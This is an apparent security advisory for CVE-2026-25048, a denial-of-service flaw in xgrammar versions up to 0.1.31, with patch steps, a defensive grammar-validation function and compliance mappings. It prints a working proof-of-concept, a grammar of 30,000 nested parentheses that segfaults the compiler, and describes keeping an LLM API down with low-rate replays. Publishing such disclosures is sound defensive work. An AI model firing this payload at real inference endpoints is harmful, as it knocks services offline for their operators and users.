CVE-2026-25048

GHSA-7rgv-gqhr-fxg3 HIGH
Published March 5, 2026
CISO Take

If your AI inference stack uses xgrammar for structured output generation, patch to v0.1.32 immediately — a single-line malicious grammar string crashes the inference worker process cold. Any system accepting externally-supplied grammar rules is exposed to trivial DoS; no special skills required. This is a patch-now, no-exception item for teams running constrained LLM generation pipelines.

Affected Systems

| Package  | Ecosystem | Vulnerable Range | Patched |
|----------|-----------|------------------|---------|
| xgrammar | pip       | <= 0.1.31        | 0.1.32  |

If you use xgrammar at or below 0.1.31, you're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
0.1%
chance of exploitation in 30 days
KEV Status
Not in KEV
Sophistication
Trivial

Recommended Action

  1. PATCH: Upgrade xgrammar to v0.1.32 now — `pip install --upgrade xgrammar`. Verify: `pip show xgrammar | grep Version`.
  2. AUDIT: Inventory all inference services — CI/CD pipelines, model servers, agent runtimes — for xgrammar <= 0.1.31.
  3. WORKAROUND (if patching is delayed): Validate grammar inputs server-side before passing to the compiler — reject inputs with nesting depth > 500 or total length > 10KB.
  4. DETECT: Alert on inference process crashes or abnormal restart frequency; correlate with grammar compilation events in application logs.
  5. ISOLATE: Run grammar compilation in a sandboxed subprocess with ulimit memory/stack caps to contain blast radius if a zero-day follows.
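The workaround in step 3 can be sketched as a cheap pre-compilation check on the untrusted grammar string. This is illustrative — the function name and thresholds are our own, not part of xgrammar's API:

```python
MAX_GRAMMAR_BYTES = 10 * 1024   # reject grammars over 10 KB
MAX_NESTING_DEPTH = 500         # reject pathological parenthesis nesting

def grammar_looks_safe(grammar: str) -> bool:
    """Cheap structural checks on an untrusted grammar string,
    run *before* handing it to the grammar compiler."""
    if len(grammar.encode("utf-8")) > MAX_GRAMMAR_BYTES:
        return False
    depth = max_depth = 0
    for ch in grammar:
        if ch == "(":
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch == ")":
            depth = max(depth - 1, 0)
    return max_depth <= MAX_NESTING_DEPTH
```

The published PoC string (`'(' * 30000 + 'a'`) fails both checks, so it never reaches the vulnerable compiler.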

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
- Article 9 - Risk Management System — technical robustness and safety

ISO 42001
- 8.4 - AI system operation and monitoring
- A.6.2.6 - Availability of AI system

NIST AI RMF
- GOVERN-4.1 - Organizational risk policies cover AI risks
- MANAGE-2.2 - Mechanisms to maintain AI system reliability and resilience
- MANAGE-2.4 - Residual risks are managed

OWASP LLM Top 10
- LLM04 - Model Denial of Service
- LLM10:2025 - Unbounded Consumption

Technical Details

NVD Description

### Summary

A multi-level nested grammar rule causes a segmentation fault (core dump).

### Details

A stack overflow or memory exhaustion is triggered by constructing a malicious grammar rule containing 30,000 layers of nested parentheses.

### PoC

```python
#!/usr/bin/env python3
"""XGrammar - Math Expression Generation Example"""
import xgrammar as xgr
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer, AutoConfig

s = '(' * 30000 + 'a'
grammar = f"root ::= {s}"

def main():
    device = "cuda" if torch.cuda.is_available() else "cpu"
    model_name = "Qwen/Qwen2.5-0.5B-Instruct"

    # Load model
    model = AutoModelForCausalLM.from_pretrained(
        model_name,
        torch_dtype=torch.float16 if device == "cuda" else torch.float32,
        device_map=device
    )
    tokenizer = AutoTokenizer.from_pretrained(model_name)
    config = AutoConfig.from_pretrained(model_name)

    # Math expression grammar
    math_grammar = grammar

    # Setup
    tokenizer_info = xgr.TokenizerInfo.from_huggingface(
        tokenizer, vocab_size=config.vocab_size
    )
    compiler = xgr.GrammarCompiler(tokenizer_info)
    compiled_grammar = compiler.compile_grammar(math_grammar)

    # Generate
    prompt = "Math: "
    inputs = tokenizer(prompt, return_tensors="pt").to(device)
    xgr_processor = xgr.contrib.hf.LogitsProcessor(compiled_grammar)
    output_ids = model.generate(
        **inputs,
        max_new_tokens=50,
        logits_processor=[xgr_processor]
    )
    result = tokenizer.decode(
        output_ids[0][len(inputs.input_ids[0]):],
        skip_special_tokens=True
    )
    print(f"Generated expression: {result}")

if __name__ == "__main__":
    main()
```

```
> pip show xgrammar
Name: xgrammar
Version: 0.1.31
Summary: Efficient, Flexible and Portable Structured Generation
Home-page:
Author: MLC Team
Author-email:
License: Apache 2.0
Location: /home/yuelinwang/.local/lib/python3.10/site-packages
Requires: numpy, pydantic, torch, transformers, triton, typing-extensions
Required-by:
> python3 1.py
`torch_dtype` is deprecated! Use `dtype` instead!
Segmentation fault (core dumped)
```

### Impact

DoS

Exploitation Scenario

Adversary discovers a public-facing LLM API endpoint (e.g., an AI coding assistant or data extraction service) that accepts a user-defined output schema powered by xgrammar for structured JSON generation. They craft a grammar string — `'(' * 30000 + 'a'` — trivially generated in one Python line. Submitting this as the output grammar schema triggers a stack overflow during xgrammar compilation, segfaulting the inference worker. On non-containerized deployments, the service is down until manual intervention. On Kubernetes, the pod restart loop is detectable but creates sustained degraded availability. With no input validation, the adversary sustains the DoS by replaying the request at low frequency, evading rate-limiting thresholds.

Timeline

Published
March 5, 2026
Last Modified
March 5, 2026
First Seen
March 24, 2026